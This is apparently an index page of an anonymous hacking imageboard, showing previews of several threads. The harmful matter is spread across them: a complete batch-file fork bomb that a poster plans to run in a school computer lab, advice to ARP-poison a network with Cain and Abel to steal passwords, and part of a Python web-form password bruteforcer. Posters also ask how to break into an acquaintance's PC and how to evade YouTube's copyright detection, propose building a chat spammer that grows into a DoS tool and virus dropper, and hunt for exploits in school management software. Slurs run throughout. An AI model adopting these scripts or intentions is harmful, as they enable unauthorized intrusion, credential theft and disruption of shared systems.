[Home] [Archive] [Manage]
[Blackomen] [Cloudcity] [Deepblue] [Electricblue] [Germany] [Greendream] [Hell] [Lasvegas] [Londerground] [Mapleleaf] [Marcabian] [Mesa] [Milw0rm] [Moonlight] [Quebec] [Rainbow] [Redwood] [Scandinavian] [Snowyhills] [Thunderdome] [Trollshido] [Wasteland] [Wirah] [Zeal]

Leave these fields empty (spam trap):
Name
Email
Subject
Comment
File
Password (for post and file deletion)
  • Supported file types are: 7Z, FLAC, GIF, JPG, MP3, OGG, PNG, RAR, SWF, TORRENT, ZIP
  • Maximum file size allowed is 2048 KB.
  • Images greater than 250x250 pixels will be thumbnailed.
  • Update, October 12th: Physics is now a full board under the Intellectual section.
  • Install the Wakaba Firefox Extension.
  • Read the Rules and FAQ before posting.

File: 1258008795444.jpg -(56998 B, 1280x905) Thumbnail displayed, click the ling for full size.
56998 No.181367   [Reply]

Ok guys. Anyone know how to bypass the copyright restrictions on Youtube?

All I know about the system is that it's automated, but it can't be scanning the video frame by frame or it would take too long. Anyone know what the system looks for, and how to change it?

There has to be a way. Man built it, so man can defeat it.

3 posts omitted. Click Reply to view.
>> No.182382  

if it were me, i would change a few random bytes here and there and try that, if not im sure you could rip out the audio http://anonym.to/?http://www.inspiredgeek.com/2008/03/16/extract-audio-from-flv-files-without-quality-degradation/
and change that a little bit and put it back.

why do you want to get around them so bad jw?

>> No.183265  

>>181367

Whenever I come across the copyright restriction it always says one key thing: "In Your Region", as far as I know, most of the copyright restrictions mainly apply to the UK (may be more countries, not 100% sure), so it must be using your IP address to determine your location in the world. Try using an international proxy and see if that works?

>> No.184749  

Audio-wise, it scans the first few minutes (or seconds, I can't remember) of the track and compares it to copyrighted songs. An easy way to avoid this is to have some nonsensical bullshit at the beginning of the video, then the real thing later on. I found an article on it a while ago, but I can't seem to find it.



File: 1258087082618.jpg -(9249 B, 263x174) Thumbnail displayed, click the ling for full size.
9249 No.181770   [Reply]

Forgive my faildom, I cant help it.
I was hoping someone here could help to sort this problem. I Would like an automated lick(on a set point) triggered by the recognition of a string of numbers from a jpeg/flash format.
Regards, ZeroCool

>> No.181972  

swoopoo=scam

>> No.182210  

So the numbers are images? Are the image files named specific to that number or are they random?

>> No.184545  

sodd swoopo after you make ur bid :]



File: 1258431067200.jpg -(45096 B, 480x600) Thumbnail displayed, click the ling for full size.
45096 No.183379   [Reply]

This pretentious bastard I know is hording a huge chunk of source code to some software he was compiling for me on his pc...I want it back..and I want that fucker to pay

Is there a way I can sneak into his pc [ex. ftp,ssl,etc.]and get it back...and possibly fuck him over in the process...

Just stealing his computer wont do me any good.... he is in the Netherlands...Im in the states >.>

I read the wiki...I Haven't found shit....can /scx/ enlighten me?

>> No.184056  

lol
dump americunt

>> No.184323  

And there is no way whatsoever you can do a remote desktop?
And you can't simply ask?
And you can't get to the Netherlands?

Think, idiot.

>> No.184407  

>>184323

no
tried
no chance in hell

help or gtfo please



File: 1254722715769.jpg -(22983 B, 251x212) Thumbnail displayed, click the ling for full size.
22983 No.164913   [Reply]

hi, just wondering when you all really got into coding/etc. where did you learn it from? what made you want to pursue it? pic unrelated. i'm just curious

>> No.165045  

TI Basic -> QBasic -> C -> Java -> ASM(favorite) -> Python(yuck)

Also, I intend upon learning COBOL. It goes well with my boring personality, and you can make lots of $$ / lots of job security thus

>> No.183492  

BASIC > TurboC > GML (Game Maker) > Java > Javascript > PHP > C++ > C# (XNA)

I started on the spectrum and amstrad, wanted to make games. It evolved to game maker, trust me, that shitty little program teaches you a lot. Leaned java and C++ in college, now developing games in C#. Ive always wanted to be a games dev, it was a driving force. I think you need a serious goal to be a good programmer.

>> No.184329  

I learned Javascript from a summer program. (Underagefag.) Other than that, I've been trying to teach myself:
-Python
-PHP
-Cocoa
-AppleScript

I find there's a surprising lack of good Mac software within Anonymous.



File: 1257474871154.jpg -(72579 B, 668x334) Thumbnail displayed, click the ling for full size.
72579 No.179172   [Reply]

What do you guise think of this script? and is there any way to stop it after it runs?
i am going to run this on the last day of my class at computer lab.
the filename is OH SHII.bat

@ECHO OFF

:START
ECHO I DIVIDED BY ZERO OH SHIIIIIIIIIIIIIIII

start OH SHII.bat & start OH SHII.bat & start OH SHII.bat

GOTO START

9 posts and 1 images omitted. Click Reply to view.
>> No.183084  

well, if you wanted to mess with shit, get yourself cain and able and ARP poison and snag passwords. Google "ARP cain and able guide"

also, an interesting note, if you ctrl+alt+del and force quit while your arp poising, all internet is put on hold until you restart your pc or unplug yourself from the network

>> No.184219  

-OP- we DONT have admin rights and as far as i know... the oxid version of cain needs admin rights. sould i launch efc at CIA.gov or what else?

>> No.184321  

Easy admin:
Suck up to the network admin, get him to like you, watch when he logs in, and remember. Write it down ASAP.



File: 1257980155824.jpg -(604628 B, 245x433) Thumbnail displayed, click the ling for full size.
604628 No.181198   [Reply]

Hi, /scx/, I'm new here. I would like to show you a python 3.0 password bruteforcer of mine, here's the code:

import time
import urllib
import urllib.request
def base36encode(number):

alphabet = '0123456789abcdefghijklmnopqrstuvwxyz'
base36 = ''
while number:
number, i = divmod(number, 36)
base36 = alphabet[i] + base36
return base36 or alphabet[0]

submit=input("Enter in the form page: ")
url=input("Enter the form action: ")

tl;dr. lick ling to view the boring shit.
2 posts omitted. Click Reply to view.
>> No.182501  

pretty easy to lock out server side.

>> No.184276  

you should use caps in your alphabet but the code is good

>> No.184320  

alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz¡™£¢∞§¶•ªº–≠œ∑´®†¥¨ˆøπ“‘«åß∂ƒ©˙∆˚¬…æΩ≈ç√∫˜µ≤≥÷⁄€‹›fifl‡°·‚—±Œ„´‰ˇÁ¨ˆØ∏”’»ÅÍÎÏ˝ÓÔÒÚÆ¸˛Ç◊ı˜Â¯˘¿'



File: 1253451310388.jpg -(345006 B, 2048x1536) Thumbnail displayed, click the ling for full size.
345006 No.154086   [Reply]

salim

2 posts omitted. Click Reply to view.
>> No.157169  

1.)salim
2.)???
3.)PROFIT!!!

>> No.158860  

Salim is a cool guy, eh rides on planes and doesnt afraid of anything.

>> No.183493  

you mean ISLAM right?



File: 1256053583172.jpg -(47908 B, 500x298) Thumbnail displayed, click the ling for full size.
47908 No.172199   [Reply]

Hai anons, I have an idea, why don't we make a program together ?

We will use Visual Basic as our language (Visual Basic compiler can be downloaded for FREE from Microsoft you cheap faggot)

And I know VB isn't a very serious language (nevertheless it CAN make powerful things) but I chose it because it's VERY easy to learn, especially if you already know another language and much can be accomplished with it,

Heres how it will work, we will code a chat spammer together (which spams chat by saying "DESU DESU DESU etc..." and spams Habbo by saying "A.I.D.S. etc..." or whatever profanities we can imagine) , and every one of us will submit at least 1 line of code (maximum is 3) the buttons and/or other classes that you dragand drop on the form MUST be specified and you MUST tell us what you have added/changed and what it does ALSO you can only place one class/object onto the form (for now).

Once we make a chat spammer we shall test it on the major chat programs then we test it on online games and when it's done we will evolve the program into something else maybe into a DOS-attack program or something that sends exe viruses in the form of .scr files, our imagination is endless!

tl;dr. lick ling to view the boring shit.
11 posts and 3 images omitted. Click Reply to view.
>> No.176624  

works fine for me

>> No.176724  

Doesn't work on linux, faggots.

>> No.183464  

YOU BEST BE FUCKING TROLLING NIGGER



File: 1257551330483.jpg -(45102 B, 376x500) Thumbnail displayed, click the ling for full size.
45102 No.179614   [Reply]

ok well its my first time here and i think that i will love this splace i was referd through /b/ on 4chn and i think that this will be my new home so i decided to ask a question to start out anyone know about tyler technoligies and there sis system for school managment well im wondering if there if anyone has found a bug in it that is exploitable
and
i have always had remedial code hacking skills btu where im strong is in hardware hacking so i was also wanting to ask if anyone knew something a program i could use to disasemble and maybe anylyze line by line the way that a standerd program would address register values and the exact functions used in common conventional programming i dont want a list of the accepted commands i just want a disasembler or something similer that can help me activly anylyze a program and the way it addresses registry values now pleas dont flame me on this if i said anything wrong or weird but pleas help me learn

also one last thing i am useing the traditional sense of the word hacker im not sure if anyone here is dumb enough to think i have malicios intent well i do a litle but everyone does so i would just like to say i want to learn to code extensivly and how to better myself and push things to a point thatg they werent ment to be not like i want to atack someone in specific or something but thank you very much in closeing this has been michael foxridge and thank you
picture unrelated but awsome

4 posts omitted. Click Reply to view.
>> No.180601  

>>180568

uhhh thanks is there anyway you might be able to help me use it?

>> No.182807  

wow, ur one dumb son a bich. EPIC FAIL!

>> No.183399  

>>182807

Assuming you're on Linux:

objdump -d [compiled_file_goes_here] > [output_file_goes_here]



File: 1258408216897.jpg -(32063 B, 1280x360) Thumbnail displayed, click the ling for full size.
32063 No.183315   [Reply]

Hey, /scx/, I just made an emailer. Send email from anybody with any name. ling is here http://anonym.to/?http://myspecialsite.site90.net/



Delete Post []
Password
Previous [0] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]